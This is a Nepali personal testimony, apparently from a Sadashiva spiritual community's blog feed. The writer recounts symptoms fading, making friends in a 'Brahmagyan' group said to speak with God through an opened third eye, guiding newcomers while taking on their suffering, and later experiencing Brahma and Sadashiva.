लक्षणहरू हराएर मलाइ ति दुखाइहरू याद नअाउने हुन थाल्याे। मेराे जीवनमा नया फुर्ती जागरण जाग्न थाल्याे। मेरा नया साथीहरू भए ब्रह्मज्ञानमा र ती साथीहरूबाट धे रैकुरा सिक्ने, बुझ्ने माैका पाएँ । ती ब्रह्मज्ञानी साथीहरूकाे स्वस्थ तेस्राे नेत्र खुलेकाे थियाे । तिनीहरू सँग मन्दि रमा जाँदा उनीहरू भगवानसँग कुरा गर्थे त्यसै बेला उनिहरू मार्फत भगवान सँग गुरार माग्न पाइन्थ्याे । पछि पछि म मा पनि त्याे क्षमता अाउन थाल्याे र मैले पनि अरू नयाँ साथीहरूलाइ डाेर्याउन मद्दत गरेँ । सुरूमा अरू लाइ डाेर्याउन गाह्राे हुँदाे रहेछ । जस्लाइ डाेर्यायाे त्यसैकाे कष्ट अाउदाे रहेछ । कन्या गुरूङ्ग क्लासमा म भन्दा पछि अाउनु भएकाे हाे । मैले उहाँलाइ अाफुले जानेका कुराहरू सिकाउछु भन्दा मलाइ कष्टभएकाे कुरा मलाइ याद छ । म तिन दिन चल्नै नसक्ने भएँ म अाफुलाइ कन्या गुरूङ्ग जस्तै लाग्याे । पछि क्लासमा मा मालाइ भने पछि कम भएकाे थियाे ।

केही महिना बिते पछि मैले ब्रह्मकाे अनुभव गर्ने माैका मिल्याे । त्यसकाे करिब ३ महिनापछि सदाशिवकाे अनुभव गर्ने माैका मिल्याे ।

 

]]>
https://www.sadashivacommunity.com/2017/07/14/%e0%a4%ae%e0%a5%87%e0%a4%b0%e0%a4%be%e0%a5%87-%e0%a4%b0%e0%a4%be%e0%a5%87%e0%a4%97-%e0%a4%b0-%e0%a4%89%e0%a4%aa%e0%a4%9a%e0%a4%be%e0%a4%b0%e0%a4%95%e0%a4%be%e0%a5%87-%e0%a4%af%e0%a4%be%e0%a4%a4/feed/ 0